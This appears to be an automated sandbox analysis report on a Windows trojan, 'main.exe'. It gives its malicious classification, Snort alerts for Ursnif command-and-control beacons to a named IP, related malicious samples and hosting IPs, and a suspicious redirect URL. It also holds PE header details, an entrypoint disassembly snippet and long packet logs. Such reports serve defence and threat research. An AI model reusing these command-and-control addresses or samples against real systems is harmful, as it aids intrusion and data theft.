                          • EGA enabled
                          • HDC enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Detection:MAL
                          Classification:mal100.troj.winEXE@5/2@3/1
                          EGA Information:
                          • Successful, ratio: 33.3%
                          HDC Information:
                          • Successful, ratio: 45.9% (good quality ratio 44.3%)
                          • Quality average: 83.5%
                          • Quality standard deviation: 25.8%
                          HCA Information:
                          • Successful, ratio: 100%
                          • Number of executed functions: 63
                          • Number of non-executed functions: 23
                          Cookbook Comments:
                          • Found application associated with file extension: .exe

                          Warnings

                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                          • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, ocsp.digicert.com, ctldl.windowsupdate.com
                          • Execution Graph export aborted for target mshta.exe, PID 2388 because there are no executed function
                          • Execution Graph export aborted for target powershell.exe, PID 2620 because it is empty
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          02:15:01API Interceptor17x Sleep call for process: powershell.exe modified

                          Joe Sandbox View / Context

                          IPs

                          No context

                          Domains

                          No context

                          ASNs

                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          AS-REGRURequisition Order.exeGet hashmaliciousBrowse
                          • 194.58.112.174
                          EtmrDdNaeb.exeGet hashmaliciousBrowse
                          • 194.87.219.202
                          Snedkerlims.exeGet hashmaliciousBrowse
                          • 194.58.112.174
                          fCsRo7nIN9.exeGet hashmaliciousBrowse
                          • 37.140.192.211
                          DB_aabggiecggch0x0937.exeGet hashmaliciousBrowse
                          • 31.31.196.3
                          differentialkvotienternes.exeGet hashmaliciousBrowse
                          • 194.58.112.174
                          DHL-INV-MVU.exeGet hashmaliciousBrowse
                          • 194.58.112.174
                          cqu7x.exeGet hashmaliciousBrowse
                          • 37.140.192.158
                          bin.exeGet hashmaliciousBrowse
                          • 31.31.198.156
                          PO#KS1143112022.exeGet hashmaliciousBrowse
                          • 31.31.196.3
                          Styringsgrupper.exeGet hashmaliciousBrowse
                          • 194.58.112.174
                          Wv29MuO4Cb.exeGet hashmaliciousBrowse
                          • 31.31.196.3
                          npLfeqK4z7.exeGet hashmaliciousBrowse
                          • 37.140.192.211
                          RcJ0oosUbi.exeGet hashmaliciousBrowse
                          • 194.87.216.139
                          http://monteplo24.jelastic.regruhosting.ru/m=tocas@netcabo.pt/&data=05%7C01%7C%7C9f7179bf17c64db4a9c608dabf159c8a%7C10338048193a4298abea3596ae88b05e%7C1%7C0%7C638032397061965658%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0=%7C2000%7C%7C%7C&sdata=4u1Sq9nsCPgWNr7CI0fxOkQvKQ0f/+pqMpUSCfRSAUs=&reserved=0Get hashmaliciousBrowse
                          • 151.248.124.254
                          iT8gPVC4TC.exeGet hashmaliciousBrowse
                          • 37.140.192.211
                          545187-scripttodo.ps1Get hashmaliciousBrowse
                          • 194.67.119.190
                          dvswiftsend_921101134513_932907123939.xlsGet hashmaliciousBrowse
                          • 194.87.231.59
                          ADNOC97571784.exeGet hashmaliciousBrowse
                          • 194.58.112.174
                          07aTSiH01G.exeGet hashmaliciousBrowse
                          • 194.58.112.174

                          JA3 Fingerprints

                          No context

                          Dropped Files

                          No context

                          Created / dropped Files

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1b5r1h15.c2u.psm1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Reputation:high, very likely benign file
                          Preview:1

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gmpv3qo3.pur.ps1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Reputation:high, very likely benign file
                          Preview:1

                          Static File Info

                          General

                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):7.5154778279802725
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.96%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:main.exe
                          File size:37888
                          MD5:9676298f24c8cdd4b532ac027a00f60e
                          SHA1:8d0bd57712533f1a889627706925c17ed4347ce5
                          SHA256:0f5cce66023859e9d7e3f54b78e95bf09618db5ed01fe05b765d76ab156271da
                          SHA512:525b70896530a60cf58de64e8052ef2a8eb5ccc73d86fcd1f55d4850e682e3ff44c7ebc18ab029fc479b75a9a0083765c314c542b356d7ef8a7e7e493f13e7fd
                          SSDEEP:768:/QLm41fM01vAqyRrlpItKFyr8MS1g7/s1w70anLq:/L41fMSvXArbYVrO0/saLq
                          TLSH:9503E1967C6D152DDFDF82B22B2F618087392331565A50B4737F242F9A43D1B407B263
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Y..+...x...x...x..lx...x...xQ..x...x...x..vx...x..kx...x..nx...xRich...x........PE..L.....%c............................/......

                          File Icon

                          Icon Hash:00828e8e8686b000

                          Static PE Info

                          General

                          Entrypoint:0x40182f
                          Entrypoint Section:.text
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE
                          Time Stamp:0x632596C9 [Sat Sep 17 09:43:37 2022 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:5
                          OS Version Minor:0
                          File Version Major:5
                          File Version Minor:0
                          Subsystem Version Major:5
                          Subsystem Version Minor:0
                          Import Hash:1640d668d1471f340cbe565fe63522f6

                          Entrypoint Preview

                          Instruction
                          push esi
                          xor esi, esi
                          push esi
                          push 00400000h
                          push esi
                          call dword ptr [0040203Ch]
                          mov dword ptr [00403160h], eax
                          cmp eax, esi
                          je 00007F42ECE959C7h
                          push esi
                          call dword ptr [00402008h]
                          mov dword ptr [00403170h], eax
                          call dword ptr [00402044h]
                          call 00007F42ECE955D9h
                          push dword ptr [00403160h]
                          mov esi, eax
                          call dword ptr [00402040h]
                          push esi
                          call dword ptr [00402048h]
                          pop esi
                          push ebp
                          mov ebp, esp
                          sub esp, 0Ch
                          push ebx
                          push esi
                          mov esi, eax
                          mov eax, dword ptr [00403180h]
                          mov ecx, dword ptr [esi+3Ch]
                          mov ecx, dword ptr [ecx+esi+50h]
                          lea edx, dword ptr [eax-69B24F45h]
                          not edx
                          lea ecx, dword ptr [ecx+eax-69B24F45h]
                          push edi
                          and ecx, edx
                          lea edx, dword ptr [ebp-08h]
                          push edx
                          lea edx, dword ptr [ebp-04h]
                          push edx
                          add eax, 964DA0FCh
                          push eax
                          push ecx
                          call 00007F42ECE95C2Dh
                          test eax, eax
                          jne 00007F42ECE959FCh
                          mov edi, dword ptr [ebp-04h]
                          push esi
                          push edi
                          call 00007F42ECE95D03h
                          mov ebx, eax
                          test ebx, ebx
                          jne 00007F42ECE959D8h
                          mov esi, dword ptr [edi+3Ch]
                          add esi, edi
                          push esi
                          call 00007F42ECE95424h
                          mov ebx, eax
                          test ebx, ebx
                          jne 00007F42ECE959C7h
                          push edi
                          mov eax, esi
                          call 00007F42ECE95F04h
                          mov ebx, eax
                          test ebx, ebx
                          jne 00007F42ECE959B9h
                          mov esi, dword ptr [esi+28h]
                          push eax
                          push 00000001h
                          add esi, edi
                          push edi
                          call esi
                          test eax, eax
                          jne 00007F42ECE959AAh
                          call dword ptr [0000202Ch]

                          Rich Headers

                          Programming Language:
                          • [IMP] VS2008 SP1 build 30729
                          • [LNK] VS2008 SP1 build 30729

                          Data Directories

                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0x20e80x50.rdata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x50000x10.rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x60000xd8.reloc
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x20000xa8.rdata
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                          Sections

                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          .text0x10000x10000x1000False0.718017578125data6.515539058364033IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .rdata0x20000x4c00x600False0.4635416666666667data4.488955985688776IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .data0x30000x1940x200False0.056640625data0.12227588125913882IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .bss0x40000x2dc0x400False0.7607421875data6.3016514258390215IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .rsrc0x50000x100x200False0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .reloc0x60000x80000x7200False0.9698807565789473data7.856350754061323IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                          Imports

                          DLLImport
                          ntdll.dll_snwprintf, memset, NtQuerySystemInformation, _aulldiv
                          KERNEL32.dllGetModuleHandleA, GetLocaleInfoA, GetSystemDefaultUILanguage, HeapAlloc, HeapFree, WaitForSingleObject, Sleep, ExitThread, lstrlenW, GetLastError, VerLanguageNameA, GetExitCodeThread, CloseHandle, HeapCreate, HeapDestroy, GetCommandLineW, ExitProcess, SetLastError, TerminateThread, SleepEx, GetModuleFileNameW, CreateThread, OpenProcess, CreateEventA, GetLongPathNameW, GetVersion, GetCurrentProcessId, GetProcAddress, LoadLibraryA, VirtualProtect, MapViewOfFile, GetSystemTimeAsFileTime, CreateFileMappingW, QueueUserAPC
                          ADVAPI32.dllConvertStringSecurityDescriptorToSecurityDescriptorA

                          Network Behavior

                          Snort IDS Alerts

                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                          192.168.2.3134.0.118.20349698802033203 11/16/22-02:14:48.026105TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4969880192.168.2.3134.0.118.203
                          192.168.2.3134.0.118.20349698802033204 11/16/22-02:14:48.026105TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4969880192.168.2.3134.0.118.203

                          Network Port Distribution

                          TCP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Nov 16, 2022 02:14:25.396747112 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:25.457850933 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:25.458098888 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:25.458513021 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:25.519583941 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.472409964 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.472446918 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.472465038 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.472477913 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.472493887 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.472511053 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.472527027 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.472527981 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.472544909 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.472562075 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.472575903 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.472575903 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.472578049 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.472604990 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.472639084 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.533454895 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.533502102 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.533519030 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.533530951 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.533543110 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.533555031 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.533570051 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.533586979 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.533603907 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.533620119 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.533637047 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.533652067 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.533668041 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.533684969 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.533699036 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.533715010 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.533715010 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.533730030 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.533746958 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.533797979 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.533797979 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.533798933 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.533798933 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.539521933 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.539557934 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.539746046 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.595025063 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.595071077 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.595088005 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.595101118 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.595113039 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.595129967 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.595146894 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.595164061 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.595181942 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.595197916 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.595215082 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.595231056 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.595247030 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.595263004 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.595278025 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.595297098 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.595314026 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.595329046 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.595345020 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.595360994 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.595371008 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.595376968 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.595371008 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.595392942 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.595408916 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.595424891 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.595442057 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.595446110 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.595446110 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.595446110 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.595457077 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.595473051 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.595485926 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.595489979 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.595505953 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.595508099 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.595520973 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.595532894 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.595536947 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.595555067 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.595556974 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.595571995 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.595587969 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.595603943 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.595618010 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.595621109 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.595618963 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.595648050 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.595669985 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.600761890 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.600799084 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.600816011 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.600830078 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.600982904 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.656521082 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.656563997 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.656580925 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.656599045 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.656616926 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.656634092 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.656651020 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.656666994 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.656683922 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.656701088 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.656719923 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.656737089 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.656738997 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.656753063 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.656769037 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.656785965 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.656785965 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.656801939 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.656814098 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.656819105 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.656835079 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.656835079 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.656851053 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.656858921 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.656867027 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.656883001 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.656891108 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.656898975 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.656914949 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.656920910 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.656930923 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.656940937 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.656945944 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.656961918 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.656966925 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.656977892 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.656992912 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.656996965 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.657010078 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.657016993 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.657025099 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.657041073 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.657047033 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.657057047 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.657072067 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.657088041 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.657094002 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.657104015 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.657119036 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.657119989 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.657136917 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.657141924 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.657151937 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.657160997 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.657169104 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.657185078 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.657191992 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.657200098 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.657216072 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.657222033 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.657232046 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.657241106 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.657248020 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.657263994 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.657269001 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.657279968 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.657296896 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.657299042 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.657313108 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.657320023 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.657331944 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.657347918 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.657351971 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.657363892 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.657380104 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.657387018 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.657394886 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.657404900 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.657411098 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.657427073 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.657435894 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.657443047 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.657458067 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.657464981 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.657473087 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.657485962 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.657488108 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.657504082 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.657506943 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.657521009 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.657536983 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.657542944 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.657552004 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.657567978 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.657572985 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.657583952 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.657592058 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.657598972 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.657614946 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.657624006 CET4969880192.168.2.3134.0.118.203
                          Nov 16, 2022 02:14:39.657629967 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.657645941 CET8049698134.0.118.203192.168.2.3
                          Nov 16, 2022 02:14:39.657654047 CET4969880192.168.2.3134.0.118.203
